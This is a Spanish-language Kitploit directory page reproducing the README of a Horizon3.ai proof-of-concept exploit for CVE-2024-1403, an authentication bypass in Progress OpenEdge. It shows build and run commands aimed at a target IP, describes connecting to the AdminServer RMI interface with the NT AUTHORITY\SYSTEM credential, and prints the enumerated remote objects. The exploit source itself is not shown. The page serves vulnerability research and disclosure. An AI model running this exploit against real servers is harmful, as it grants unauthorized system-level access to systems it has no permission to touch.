Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-1403 — Bypass de autenticación en Progress OpenEdge | Kitploit
Herramientas/GitHubGitHub/horizon3ai/cve-2024-1403
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónRed Teaming
GitHubhorizon3ai/cve-2024-1403

CVE-2024-1403

Bypass de autenticación en Progress OpenEdge

Ver Repositorio
177hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-1403 Progress OpenEdge Bypass de Autenticación

Una prueba de concepto de exploit para Progress OpenEdge CVE-2024-1403.

Publicación en el Blog

Más detalles aquí: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive

Uso

Debe proporcionar sus propias versiones de los siguientes jars:

  • progress.jar
  • oeauth-12.8.-.jar
  • osmetrics.jar
  • juniper.jar

Compilación

root@kitploit:~
$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java

Uso

Al ejecutar este script se intentará conectar a la interfaz RMI de AdminServer utilizando la credencial NT AUTHORITY\SYSTEM.

root@kitploit:~
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.agent.database.IAgentPlugIn

com.progress.ubroker.tools.NSRemoteObject
	com.progress.chimera.common.IChimeraHierarchy
	com.progress.ubroker.tools.IYodaRMI
	com.progress.ubroker.tools.IYodaSharedResources

com.progress.ubroker.tools.UBRemoteCommand
	com.progress.chimera.common.IChimeraRemoteCommand

com.progress.juniper.admin.JAPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.juniper.admin.IJAPlugIn

com.progress.agent.smdatabase.SMPlugIn
	com.progress.chimera.common.IChimeraRemoteObject

Siga al Equipo de Ataque de Horizon3.ai en Twitter para obtener las últimas investigaciones de seguridad:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Descargo de Responsabilidad

Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se autorice explícitamente. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo con responsabilidad.

Descargar herramienta